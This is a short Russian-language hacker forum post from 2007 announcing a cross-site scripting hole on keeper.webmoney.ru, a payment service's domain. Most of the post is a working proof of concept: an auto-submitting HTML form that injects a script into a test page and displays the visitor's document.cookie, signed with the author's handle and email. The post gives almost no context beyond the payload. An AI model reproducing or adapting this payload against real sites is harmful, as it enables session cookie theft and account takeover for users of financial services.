
04.02.2007, 22:39
|
|
Banned
Регистрация: 30.12.2006
Сообщений: 40
Провел на форуме: 484093
Репутация:
11
|
|
XSS на keeper.webmoney.ru ;)
нашел случайно - в страничках кипера увидел закоментенный блок с линком на тестовую страницу:
<form action="http://keeper.webmoney.ru/docs/test.asp" METHOD="post">
<input type=hidden name='XSS' value='<script>alert(document.cookie + "\nXSS by KPbIC(myiworm@mail.ru)")</script>'>
</form>
<script>document.forms[0].submit();</script>
|
|
|